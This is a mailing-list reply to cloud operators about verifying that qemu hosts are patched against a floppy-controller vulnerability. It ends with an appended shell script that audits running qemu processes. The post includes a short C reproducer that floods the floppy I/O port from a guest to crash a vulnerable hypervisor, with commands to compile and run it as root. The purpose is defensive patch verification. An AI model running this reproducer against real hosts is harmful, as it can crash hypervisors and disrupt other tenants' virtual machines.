On 06/04/2015 08:50 AM, Fox, Kevin M wrote:
> I'm not aware of any check that actually tests the vulnerability. Just checks 
> package versions.

Hi,

On the compute host you can check the process age using "ps aux". The
START column for every qemu-system-* process should be more recent than
the date you updated. At least, any process older than May 13th still
has the bug.

Also, using the PID, you can make sure /proc/$pid/exe is pointing to the new
binary and not a "(deleted)" one.


Within a guest, the condition of exploitation may vary from system to
system. A reproducer has been published here:
 http://seclists.org/oss-sec/2015/q2/448

Though it requires fast timing, here is an updated version to prod the
other vulnerable floppy command:

cat>venom.c<<EOF
#include <sys/io.h>
int main() {
    int i;
    iopl(3);
    for (i=0;i<10000000;i++)
        outsb(0x3f5,"\x8e\x00\x00\x00\x00\x00",6);
}
EOF
gcc -O2 venom.c && sudo ./a.out


This should crash an ubuntu-14.04 instance if qemu is still vulnerable.
However, it's not 100% guaranteed and you had better make sure qemu-kvm is
up-to-date and no old qemu instances are running.

Regards,
Tristan

_______________________________________________
OpenStack-operators mailing list
OpenStack-operators@lists.openstack.org
http://lists.openstack.org/cgi-bin/mailman/listinfo/openstack-operators
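
The two host-side checks described in the message above (process start time versus the update date, and /proc/$pid/exe pointing at a "(deleted)" binary) can be scripted as follows. This is an added example, not part of the original post; the function names, the overridable proc root and the date in the usage comment are assumptions, and the start time is derived from /proc/$pid/stat rather than parsed from "ps aux".

```shell
#!/bin/sh
# Added example (not from the original post). Function names and the
# overridable proc root are assumptions made for this sketch.

# start_epoch ROOT PID: print the process start time as a Unix timestamp,
# from "btime" in ROOT/stat and starttime (field 22) in ROOT/PID/stat.
start_epoch() (
    root=$1 pid=$2
    btime=$(awk '$1 == "btime" { print $2 }' "$root/stat")
    line=$(cat "$root/$pid/stat")
    # comm (field 2) may contain spaces or ')': drop through the last ") ".
    rest=${line##*') '}
    # What remains starts at field 3, so field 22 is now the 20th word.
    set -- $rest
    hz=$(getconf CLK_TCK 2>/dev/null || echo 100)
    echo $(( btime + ${20} / hz ))
)

# audit_qemu ROOT CUTOFF_EPOCH: print one line per qemu-system-* process that
# still maps a replaced binary or started before CUTOFF; status 1 if any.
audit_qemu() (
    root=$1 cutoff=$2 rc=0
    for dir in "$root"/[0-9]*; do
        exe=$(readlink "$dir/exe" 2>/dev/null) || continue
        case ${exe##*/} in qemu-system-*) ;; *) continue ;; esac
        pid=${dir##*/}
        case $exe in
            *' (deleted)')
                echo "$pid deleted-binary $exe"; rc=1; continue ;;
        esac
        started=$(start_epoch "$root" "$pid") || continue
        if [ "$started" -lt "$cutoff" ]; then
            echo "$pid started-before-update $started"; rc=1
        fi
    done
    exit "$rc"
)

# Live use as root (needed to read other users' exe links), GNU date assumed:
#   sh audit.sh 2015-05-13    # the day the fixed qemu package was installed
if [ "$#" -eq 1 ]; then
    audit_qemu /proc "$(date -d "$1" +%s)"
fi
```

Any process it lists has to be restarted or live-migrated before the host counts as patched.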
